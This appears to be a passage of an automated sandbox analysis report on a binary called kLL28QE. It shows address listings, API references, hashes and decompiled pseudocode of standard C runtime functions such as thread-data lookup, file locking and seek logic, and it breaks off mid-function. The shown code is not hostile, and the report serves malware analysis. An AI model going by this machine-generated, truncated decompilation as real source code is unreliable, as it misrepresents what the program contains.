                                                                                                                                                                                                      0x0040bde0
                                                                                                                                                                                                      0x0040bde5
                                                                                                                                                                                                      0x0040bde7
                                                                                                                                                                                                      0x0040bde9
                                                                                                                                                                                                      0x0040bde9
                                                                                                                                                                                                      0x0040bdc1
                                                                                                                                                                                                      0x0040bdc8
                                                                                                                                                                                                      0x0040bdca
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdd7
                                                                                                                                                                                                      0x0040bdda
                                                                                                                                                                                                      0x0040bdcc
                                                                                                                                                                                                      0x0040bdce
                                                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                                                      0x0040bdd1
                                                                                                                                                                                                      0x0040bddc
                                                                                                                                                                                                      0x0040bddc
                                                                                                                                                                                                      0x0040bdeb
                                                                                                                                                                                                      0x0040bdee
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                                                      0x0040bdf4
                                                                                                                                                                                                      0x0040bdf5
                                                                                                                                                                                                      0x0040bdf9
                                                                                                                                                                                                      0x0040bdfe
                                                                                                                                                                                                      0x0040bdff
                                                                                                                                                                                                      0x0040be00
                                                                                                                                                                                                      0x0040be05
                                                                                                                                                                                                      0x0040be08
                                                                                                                                                                                                      0x0040be0a
                                                                                                                                                                                                      0x0040bec6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bec6
                                                                                                                                                                                                      0x0040be10
                                                                                                                                                                                                      0x0040be13
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040beb4
                                                                                                                                                                                                      0x0040be19
                                                                                                                                                                                                      0x0040be1c
                                                                                                                                                                                                      0x0040be1e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040be1e
                                                                                                                                                                                                      0x0040bdee
                                                                                                                                                                                                      0x0040bd72
                                                                                                                                                                                                      0x0040bd75
                                                                                                                                                                                                      0x0040bd77
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd7f
                                                                                                                                                                                                      0x0040bd81
                                                                                                                                                                                                      0x0040bd83
                                                                                                                                                                                                      0x0040bd85
                                                                                                                                                                                                      0x0040bd85
                                                                                                                                                                                                      0x0040bd87
                                                                                                                                                                                                      0x0040bd8a
                                                                                                                                                                                                      0x0040be5b
                                                                                                                                                                                                      0x0040be5d
                                                                                                                                                                                                      0x0040be61
                                                                                                                                                                                                      0x0040be6a
                                                                                                                                                                                                      0x0040be6f
                                                                                                                                                                                                      0x0040be6f
                                                                                                                                                                                                      0x0040be72
                                                                                                                                                                                                      0x0040be77
                                                                                                                                                                                                      0x0040be78
                                                                                                                                                                                                      0x0040be79
                                                                                                                                                                                                      0x0040be7a
                                                                                                                                                                                                      0x0040be7b
                                                                                                                                                                                                      0x0040be81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd90
                                                                                                                                                                                                      0x0040bd99
                                                                                                                                                                                                      0x0040bd9e
                                                                                                                                                                                                      0x0040bda1
                                                                                                                                                                                                      0x0040bda3
                                                                                                                                                                                                      0x0040bda6
                                                                                                                                                                                                      0x0040bda8
                                                                                                                                                                                                      0x0040bdab
                                                                                                                                                                                                      0x0040bdae
                                                                                                                                                                                                      0x0040bdae
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x0040be4b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd69
                                                                                                                                                                                                      0x0040bd63
                                                                                                                                                                                                      0x0040bd2e
                                                                                                                                                                                                      0x0040bd0f
                                                                                                                                                                                                      0x0040bd14
                                                                                                                                                                                                      0x0040bd14
                                                                                                                                                                                                      0x0040bd17
                                                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bd1a
                                                                                                                                                                                                      0x0040bce9
                                                                                                                                                                                                      0x0040bce9
                                                                                                                                                                                                      0x0040bcee
                                                                                                                                                                                                      0x0040bcef
                                                                                                                                                                                                      0x0040bcf0
                                                                                                                                                                                                      0x0040bcf1
                                                                                                                                                                                                      0x0040bcf2
                                                                                                                                                                                                      0x0040bcf8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040bcf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                                                      • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                                      			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t30 = __eflags;
                                                                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                                                                      				_t22 = __ebx;
                                                                                                                                                                                                      				_push(0xc);
                                                                                                                                                                                                      				_push(0x4214d0);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                      				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                      				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                      					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                      					E004147A2();
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t28);
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                      • String ID: @.B
                                                                                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				intOrPtr _t39;
                                                                                                                                                                                                      				intOrPtr _t40;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t37 = __edx;
                                                                                                                                                                                                      				_push(8);
                                                                                                                                                                                                      				_push(0x421140);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t39 = _a4;
                                                                                                                                                                                                      				_t50 = _t39;
                                                                                                                                                                                                      				_t51 = _t50 != 0;
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					E0040FB29(_t39);
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                      					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                      					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t17 = 0x4227e0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                      						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                      					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                      					_v8 = 0xfffffffe;
                                                                                                                                                                                                      					E0040C735(_t39);
                                                                                                                                                                                                      					_t19 = 0;
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                      					_t40 = 0x16;
                                                                                                                                                                                                      					 *_t27 = _t40;
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                      					_t19 = _t40;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t19);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                                                      			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				LONG* _t21;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                                      				LONG* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t35 = __eflags;
                                                                                                                                                                                                      				_t29 = __edx;
                                                                                                                                                                                                      				_t25 = __ebx;
                                                                                                                                                                                                      				_push(0xc);
                                                                                                                                                                                                      				_push(0x421490);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                      				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                      					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                      					__eflags = _t33 -  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 != 0) {
                                                                                                                                                                                                      							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      							if(_t23 == 0) {
                                                                                                                                                                                                      								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									_push(_t33);
                                                                                                                                                                                                      									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 =  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                      						_t33 =  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                      						InterlockedIncrement(_t33);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                      					E00414067();
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                                                                      					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t33);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(049B1648), ref: 00414050
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                                                                      			E00413610() {
                                                                                                                                                                                                      				signed long long _v12;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				signed long long _v28;
                                                                                                                                                                                                      				signed char _t8;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					_v20 =  *0x41fb50;
                                                                                                                                                                                                      					_v28 =  *0x41fb48;
                                                                                                                                                                                                      					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                      					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                      					asm("fld1");
                                                                                                                                                                                                      					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                      					asm("fnstsw ax");
                                                                                                                                                                                                      					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						return __eax;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                      				char _t82;
                                                                                                                                                                                                      				signed int _t84;
                                                                                                                                                                                                      				intOrPtr* _t86;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                                                                                      				signed int _t92;
                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                      				signed char _t98;
                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                                      				intOrPtr* _t104;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				signed int _t114;
                                                                                                                                                                                                      				intOrPtr _t115;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t105 = __esi;
                                                                                                                                                                                                      				_t97 = __edx;
                                                                                                                                                                                                      				_t104 = _a4;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t121 = _t104;
                                                                                                                                                                                                      				if(_t104 != 0) {
                                                                                                                                                                                                      					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                      					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                      					_v8 = _t70;
                                                                                                                                                                                                      					if(__eflags < 0) {
                                                                                                                                                                                                      						 *(_t104 + 4) = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(1);
                                                                                                                                                                                                      					_push(_t87);
                                                                                                                                                                                                      					_push(_t70);
                                                                                                                                                                                                      					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                      					__eflags = _t71 - _t87;
                                                                                                                                                                                                      					_v12 = _t71;
                                                                                                                                                                                                      					if(_t71 < _t87) {
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return _t71 | 0xffffffff;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                      						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                      						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                      							_t73 =  *_t104;
                                                                                                                                                                                                      							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                      							_push(_t105);
                                                                                                                                                                                                      							_v16 = _t73 - _t92;
                                                                                                                                                                                                      							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                      							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                      								__eflags = _t98;
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									L15:
                                                                                                                                                                                                      									__eflags = _v12 - _t87;
                                                                                                                                                                                                      									if(_v12 != _t87) {
                                                                                                                                                                                                      										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                      										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                      											L40:
                                                                                                                                                                                                      											_t75 = _v16 + _v12;
                                                                                                                                                                                                      											__eflags = _t75;
                                                                                                                                                                                                      											L41:
                                                                                                                                                                                                      											return _t75;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                      										__eflags = _t99 - _t87;
                                                                                                                                                                                                      										if(_t99 != _t87) {
                                                                                                                                                                                                      											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                      											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                      											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                      											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												L39:
                                                                                                                                                                                                      												_t66 =  &_v12;
                                                                                                                                                                                                      												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                      												__eflags =  *_t66;
                                                                                                                                                                                                      												goto L40;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_push(2);
                                                                                                                                                                                                      											_push(0);
                                                                                                                                                                                                      											_push(_v8);
                                                                                                                                                                                                      											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(_v12);
                                                                                                                                                                                                      												_push(_v8);
                                                                                                                                                                                                      												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                      												__eflags = _t81;
                                                                                                                                                                                                      												if(_t81 >= 0) {
                                                                                                                                                                                                      													_t82 = 0x200;
                                                                                                                                                                                                      													__eflags = _a4 - 0x200;
                                                                                                                                                                                                      													if(_a4 > 0x200) {
                                                                                                                                                                                                      														L35:
                                                                                                                                                                                                      														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                      														L36:
                                                                                                                                                                                                      														_a4 = _t82;
                                                                                                                                                                                                      														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                      														L37:
                                                                                                                                                                                                      														if(__eflags != 0) {
                                                                                                                                                                                                      															_t63 =  &_a4;
